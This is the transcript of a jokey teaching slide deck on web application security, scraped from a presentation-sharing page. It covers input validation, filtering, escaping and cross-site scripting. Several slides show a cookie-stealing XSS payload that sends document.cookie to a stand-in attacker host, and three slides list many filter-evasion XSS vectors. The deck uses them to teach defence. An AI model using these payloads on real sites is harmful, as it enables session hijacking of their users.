Basic web application security
Sponsored Links
This presentation is the property of its rightful owner.
1 / 65

Basic Web Application Security PowerPoint PPT Presentation


  • 48 Views
  • Uploaded on
  • Presentation posted in: General

Basic Web Application Security. User Input. Kick Your Arse. Three Ways. (All Awesome). Validation. Passive. (No touchy-touchy). This is a Number. 2. This is not a Number. a. This is really not a Number. <script>alert(‘ loldongs ’)</script>. Filtering. Destructive. (One-Way Street).

Download Presentation

Basic Web Application Security

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Basic WebApplicationSecurity


User Input


Kick Your Arse


Three Ways

(All Awesome)


Validation


Passive

(No touchy-touchy)


This is a Number.

2


This is not a Number.

a


This is really not a Number.

<script>alert(‘loldongs’)</script>


Filtering


Destructive

(One-Way Street)


Only letting the good stuff in.


or


Keeping out the bad stuff.


What’s the diff?

(Bro.)


Both can be error-prone...


What happens when

you screw it up?

White-Listing  Usability Problems

Black-Listing  SecurityProblems

(Always a trade-off.)


Escaping


Transport

Point A  Point B


Data will be the same on both sides.


Different Media,Different Escaping


HTML

<b>Huh.</b>

<p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p>

<b>Huh</b>


SQL

Sam O’Brien

INSERT INTO mah_peeps (name)

VALUES (‘Sam O\’Brien‘);

1, Sam O’Brien, 2010-09-02 18:30:00


XSS

(Cross-Site Scripting)


SS

(XTREME Site Scripting)


Sticking Scripts Where They Don’t Belong.

You there, down the back.

Stop sniggering.


<script>alert(‘HACKED BY LOLDONGS’)</script>

Amateurs!


<script>alert(document.cookie)</script>

Hmm.


<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Oh shit.


Why is this uncool?

(Yeah! Why?)


<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Ooooh shit.


<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Oooooooooooh shit.


<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Oooooooooooooooooh shit.


Why is this really uncool?

(Because shut up.)


HTTP

Hyper-Text Thingy I-forgot-again


Stateless


No Idea Who You Are.


It can guess.(Badly.)

IP Address

Browser User-Agent


Sends a cookie with each request.

(A basket of goodies that the browser sends faithfully every request.)


The Server puts a unique ID in the basket.

PHPSESSID=123your456mum789

__utma=12948.23.4211414.5553

is_a_furry=1


Browser sends the ID every request.

PHPSESSID=123your456mum789


<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Look again.


THEY HAVE YOUR COOKIE.

Ooooooooooooooooooooooo-


Preventing Shenanigans


HTML

Validation Really Hard.


HTML

Filtering Still Really Hard.

  • Use a library,eg. HTML Purifier.


HTML

Escaping Dead Easy.

  • Most languages have stuff to handle this, eg.

  • htmlentities(), cgi.escape(), CGI.escape()


How hard is filtering?

(It’s just <script>, right?)


THIS HARD.

<IMG SRC=javascript:alert('a')>

<imgsrc=javascript:alert(&quot;a&quot;)>

<img “””><script>alert('a')</script>”>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;

&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;

&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72

&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72

&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="javascript:alert('a');“>

<IMG SRC="jav&#x09;as&#x09cript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<SCR\0IPT>alert('a')</SCR\0IPT>

<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>

<imgonmouseover!#$%&=alert('a')>

<<SCRIPT>alert("a");//<</SCRIPT>

<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>

<SC\0RIPT SRC=http://foo/x.js?<B>

<script src=//foo/x.js>

<imgsrc=”javascript:alert('a')”

  • (Well, then.)


THIS HARD.

<iframesrc=http://foo/x.html <

<body background=”javascript:alert('a')”>

<BODY ONLOAD=alert('a')>

<imgdynsrc=”javascript:alert('a')”>

<imglowsrc=”javascript:alert('a')”>

<BGSOUND SRC=javascript:alert('a')>

<BR SIZE=”&{alert('a')}”>

<LAYER SRC=”http://foo/x.html”></LAYER>

<link rel=”stylesheet” href=”javascript:alert('a');”>

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE>

<IMG SRC='vbscript:msgbox(“a”)'>

<imgsrc=”livescript:alert('a')”>

žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)

<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert('a');”>

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,

PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

  • (Well, then.)


THIS HARD.

<DIV STYLE="background-image: url(javascript:alert('a'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a

\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061

\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('a'))">

<DIV STYLE="width: expression(alert('a'));">

<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">

exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("a"))'>

<STYLE TYPE="text/javascript">alert('a');</STYLE>

<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A>

<BASE HREF="javascript:alert('a');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT>

<EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg=="

type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

  • (Well, then.)


And one last thing.

(Groan.)


Remember <script>alert()</script>?

(Yes, I do. Shut up.)


alert() can be ANY JAVASCRIPT.

(Yes, and...?)


Do you have any forms on your page?

(Yes.)


Do you have any javascript functions your site uses to do anything useful?

(... Yes.)


Do your site make any AJAX calls to do anything useful?

(... Oh.)


That injected code can trigger forms, run javascript functions, or make AJAX calls.

(... Oooooh.)


Send someone to a link that looks like:http://my.site/?user=<script>doStuff();</script>

(... Oooooooooh.)


Or store something that will output this on someone’s profile page:<script>doStuff();</script>

(... Oooooooooooooooh.)


... And you’re hosed.

(Shit.)


The Human Element

Touchy-Feely Commie Bullshit.


a

Touchy-Feely Commie Bullshit.


  • Login